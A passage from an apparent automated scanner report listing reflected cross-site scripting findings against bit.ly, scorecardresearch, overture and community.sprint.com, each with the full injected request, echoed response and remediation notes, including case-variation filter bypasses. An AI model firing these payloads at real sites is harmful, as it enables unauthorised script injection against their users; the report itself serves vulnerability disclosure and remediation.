Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/742697ebb35<script>alert(1)</script>63fe973072f

5.28. http://api.bit.ly/shorten [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 75787<script>alert(1)</script>6092a370891 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL75787<script>alert(1)</script>6092a370891&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:09 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 358
Etag: "5c2db80dd5e3e6ca46557b8c7b52447844cb349e"

processBitlyURL75787<script>alert(1)</script>6092a370891({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904": {"userHash": "qjnyKb", "shortKeywordUrl": "", "hash": "q7VV6y",
...[SNIP]...

5.29. http://api.bit.ly/shorten [longUrl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bit.ly
Path:   /shorten

Issue detail

The value of the longUrl request parameter is copied into the HTML document as plain text between tags. The payload 6fd73<script>alert(1)</script>6c37e9d4b was submitted in the longUrl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shorten?version=2.0.1&apiKey=R_25a57bc9fea6eef6bcb03928dd05d28d&login=reutersdotcom&callback=processBitlyURL&longUrl=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b&refreshUrlTimestamp=1315097313283 HTTP/1.1
Host: api.bit.ly
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _bit=4e5e58aa-0030b-0228e-cbac8fa8

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:50:24 GMT
Content-Type: application/javascript; charset=utf-8
Connection: keep-alive
Content-Length: 356
Etag: "e4aae6323c61daeb31d345afaa81c9ae9ccce2b8"

processBitlyURL({"errorCode": 0, "errorMessage": "", "results": {"http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D201109046fd73<script>alert(1)</script>6c37e9d4b": {"userHash": "ooSyTz", "shortKeywordUrl": "", "hash": "q1d6Wf", "shortCNAMEUrl": "http://reut.rs/ooSyTz", "shortUrl": "http://reut.rs/ooSyTz"}}, "statusCode": "OK"})

5.30. http://api.echoenabled.com/v1/search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://api.echoenabled.com
Path:   /v1/search

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<a>00081b2be27 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v1/search?callback=jQuery16106635923383291811_1315097306218&q=itemsPerPage%3A5+sortOrder%3AreverseChronological+-state%3AModeratorDeleted+-state%3ASystemFlagged+-state%3AModeratorFlagged+-provider%3AContextVoice+-source%3Areuters.com+-source%3Ablogs.reuters.com++childrenof%3Ahttp%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F04%2Fus-weather-football-idUSTRE78222D20110904+36fdf<a>00081b2be27&appkey=prod.reuters.com&_=1315097329735 HTTP/1.1
Host: api.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Server: Yaws/1.85 Yet Another Web Server
Date: Sun, 04 Sep 2011 00:58:54 GMT
Content-Length: 161
Content-Type: application/x-javascript; charset="utf-8"

jQuery16106635923383291811_1315097306218({ "result": "error", "errorCode": "wrong_query", "errorMessage": "Parse error near: \"36fdf<a>00081b2be27\" at 299" });

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 8ef90<script>alert(1)</script>12b53f97162 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=78ef90<script>alert(1)</script>12b53f97162&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:08 GMT
Date: Sun, 04 Sep 2011 01:11:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"78ef90<script>alert(1)</script>12b53f97162", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload b5525<script>alert(1)</script>cfd9ca8e7d0 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=b5525<script>alert(1)</script>cfd9ca8e7d0&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:12 GMT
Date: Sun, 04 Sep 2011 01:11:12 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"b5525<script>alert(1)</script>cfd9ca8e7d0", c16:"", r:""});



5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e62e9<script>alert(1)</script>9e2b676467b was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888e62e9<script>alert(1)</script>9e2b676467b&c3=2&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:09 GMT
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888e62e9<script>alert(1)</script>9e2b676467b", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 91ca1<script>alert(1)</script>32419e9e9c1 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=291ca1<script>alert(1)</script>32419e9e9c1&c4=&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"291ca1<script>alert(1)</script>32419e9e9c1", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 187f1<script>alert(1)</script>11f8c27111d was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=187f1<script>alert(1)</script>11f8c27111d&c5=&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:10 GMT
Date: Sun, 04 Sep 2011 01:11:10 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"187f1<script>alert(1)</script>11f8c27111d", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload de650<script>alert(1)</script>9da77839bed was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=de650<script>alert(1)</script>9da77839bed&c6=&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"de650<script>alert(1)</script>9da77839bed", c6:"", c10:"", c15:"", c16:"", r:""});



5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload bdb1a<script>alert(1)</script>b70cafdef9d was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=bdb1a<script>alert(1)</script>b70cafdef9d&c15=&tm=744917 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 01:11:11 GMT
Date: Sun, 04 Sep 2011 01:11:11 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"bdb1a<script>alert(1)</script>b70cafdef9d", c10:"", c15:"", c16:"", r:""});



5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ec8"><script>alert(1)</script>c7d472a83b1 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=1001507650&type=news&ctxtId=news&keywordCharEnc=utf8&source=npc_mcclatchy_sacramentobee_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop&ctxtCat=news&outputCharEnc=latin1&css_url=http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1&tg=1&refUrl=http%3A%2F%2Fwww.sacbee.com%2F2011%2F09%2F03%2F3883102%2Fsprint-could-be-winner-in-thwarted.html&du=1&cb=1315097337736&ctxtContent=%3Chead%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.publish2.com%2Fnewsgroups%2Fstate-worker.js%3Fjsonp_callback%3DjQuery15205311797398608178_1315097321812%26amp%3B_%3D1315097336789%22%3E%3C%2Fscript%3E%3Cscript%20async%3D%22%22%20src%3D%22http%3A%2F%2Fapi.twitter.com%2F1%2Fstatuses%2Fuser_timeline.json%3Fscreen_name%3DTheStateWorker%26amp%3Bcallback%3DjQuery15205311797398608178_1315097321811%26amp%3B_%3D1315097336786%22%3E%3C%2Fscript%3E%0A%20%20%20%20%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.scribd.com%2Fjavascripts%2Fembed_code%2Finject.js%22%3E%3C%2Fscript%3E%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%20%20 HTTP/1.1
Host: cm.npc-mcclatchy.overture.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxNTZ0MAZ7BMtQw=

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:22 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyM3Q0MzY0MAc4NMmAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:03:22 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 857


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css84ec8"><script>alert(1)</script>c7d472a83b1" type="text/css">
...[SNIP]...

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:27 GMT
Server: Apache-Coyote/1.1
X-JAL: 21
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=155803 t=1315099167532475
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless61c0e"><ScRiPt>alert(1)</ScRiPt>c060dbf3219/customer-service/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72004"%3balert(1)//f27891277f2 was submitted in the REST URL parameter 3. This input was echoed as 72004";alert(1)//f27891277f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless72004"%3balert(1)//f27891277f2/customer-service/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:28 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=125450 t=1315099168721365
Connection: close
Content-Length: 40583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
fileLoadingTooltip = "Loading user profile";
var profileErrorTooltip = "There was an error loading that profile information.";

var projectChooserUrl = "/baw/community/buzzaboutwireless72004";alert(1)//f27891277f2/customer-service/project-chooser!input.jspa";

var containerShortUrl = "/baw/container-short.jspa";
var containerLoadingTooltip = "Loading place information.";
var containerErr
...[SNIP]...

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:34 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=131245 t=1315099174578986
Connection: close
Content-Length: 40628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<form action="/baw/community/buzzaboutwireless/customer-servicee620f"><ScRiPt>alert(1)</ScRiPt>df523a5d14b/search.jspa" method="get" id="jive-userbar-search-form">
...[SNIP]...

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.sprint.com
Path:   /baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0f1a"%3balert(1)//887e419074d was submitted in the REST URL parameter 4. This input was echoed as d0f1a";alert(1)//887e419074d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baw/community/buzzaboutwireless/customer-serviced0f1a"%3balert(1)//887e419074d/sprintdotcom-support HTTP/1.1
Host: community.sprint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 01:19:35 GMT
Server: Apache-Coyote/1.1
X-JAL: 10
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent,Accept-Encoding
X-JSL: D=171254 t=1315099175790172
